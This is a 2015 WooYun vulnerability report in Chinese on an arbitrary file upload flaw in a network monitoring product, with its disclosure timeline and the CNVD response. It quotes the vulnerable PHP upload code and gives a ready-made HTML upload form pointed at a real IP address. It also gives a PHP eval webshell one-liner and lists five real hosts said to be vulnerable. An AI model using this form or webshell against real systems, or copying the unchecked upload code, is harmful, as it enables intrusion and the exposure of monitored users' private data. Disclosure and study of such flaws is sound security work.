当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109331

漏洞标题:中科新业网络哨兵任意文件上传getshell

相关厂商:中科新业

漏洞作者: 路人甲

提交时间:2015-04-21 16:57

修复时间:2015-07-23 14:38

公开时间:2015-07-23 14:38

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-21: 细节已通知厂商并且等待厂商处理中
2015-04-24: 厂商已经确认,细节仅向厂商公开
2015-04-27: 细节向第三方安全合作伙伴开放
2015-06-18: 细节向核心白帽子及相关领域专家公开
2015-06-28: 细节向普通白帽子公开
2015-07-08: 细节向实习白帽子公开
2015-07-23: 细节向公众公开

简要描述:

中科新业网络哨兵任意文件上传getshell,导致其所监控的网络内网络用户隐私泄露,包括上网记录,邮件,聊天记录等

详细说明:

/ucenter/sjjk/doajaxfileupload.php


漏洞代码

else if ( empty( $_FILES[$fileElementName]['tmp_name'] ) || $_FILES[$fileElementName]['tmp_name'] == "none" )
{
$error = "No file was uploaded..";
}
else{
$msg .= $_FILES[$fileElementName]['name'];
$upload_dir = "../temp/";
$filename = $_FILES[$fileElementName]['name'];
move_uploaded_file( $_FILES[$fileElementName]['tmp_name'], $upload_dir."/".$filename );
@unlink( @$_FILES[$fileElementName] );
//...
}


将下面的代码保存为getshell.htm 上传php文件即可获取shell

<form method="post" action="https://60.223.226.154/ucenter/sjjk/doajaxfileupload.php?flag=file"  encType="multipart/form-data">
<input type="file" size="35" name="fileToUpload_file"/>
<input type="hidden" name="fileframe" value="1"/>
<input type="submit" value="upload"/>
</form>

漏洞证明:

上传后文件路径为:/ucenter/temp/+文件名

<?php @eval($_REQUEST['x']);?>


https://60.223.226.154/ucenter/sjjk/doajaxfileupload.php?flag=file
成功上传后为:
https://60.223.226.154/ucenter/temp/wy.php

2.png


5个案例:
https://125.93.31.253/ucenter/
https://60.223.226.154/ucenter/
https://110.65.138.9/ucenter/
https://218.108.62.254/ucenter/
https://220.165.220.62/ucenter/

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-04-24 14:36

厂商回复:

CNVD未直接复现所述情况,已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。

最新状态:

暂无